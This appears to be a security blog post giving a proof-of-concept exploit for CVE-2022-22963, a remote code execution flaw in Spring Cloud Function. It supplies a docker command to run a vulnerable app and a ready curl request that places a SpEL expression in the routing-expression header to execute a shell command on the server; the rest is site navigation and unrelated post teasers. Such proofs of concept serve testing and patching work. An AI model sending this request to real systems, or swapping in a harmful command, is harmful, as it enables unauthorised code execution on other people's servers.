CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’

Or using Burp suite:

R K

Next CVE-2022-27254 : PoC For Vulnerability In Honda's Remote Keyless System »

Previous « Casper-Fs : A Custom Hidden Linux Kernel Module Generator

Leave a Comment

Share

Published by

R K

Tags: CVE-2022-22963Java Frameworkremote code execution

4 years ago

Recent Posts

TECH

Why Deploying AI Is Just the Beginning: The Case for Ongoing AI Operations Monitoring

Most enterprise AI programs treat deployment as the destination. The business case is built around…

6 hours ago

How To

Bash Scripting Best Practices Every Beginner Should Know

Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…

5 days ago

How To

How To Create A Self-Signed SSL Certificate Using Bash And OpenSSL

Introduction A self-signed SSL certificate is a certificate that is created and signed by the…

5 days ago

How To

How To Debug Bash Scripts Using bash -x And set Commands

Introduction Debugging is an important part of Bash scripting. When a script does not work…

5 days ago

How To

How To Use Cron Jobs With Bash Scripts For Automation

Introduction Cron jobs are used in Linux to run commands or Bash scripts automatically at…

5 days ago

How To

How To Use Pipes In Bash Scripts For Command Chaining

Introduction Pipes are an important feature in Linux and Bash scripting. A pipe allows you…

5 days ago

L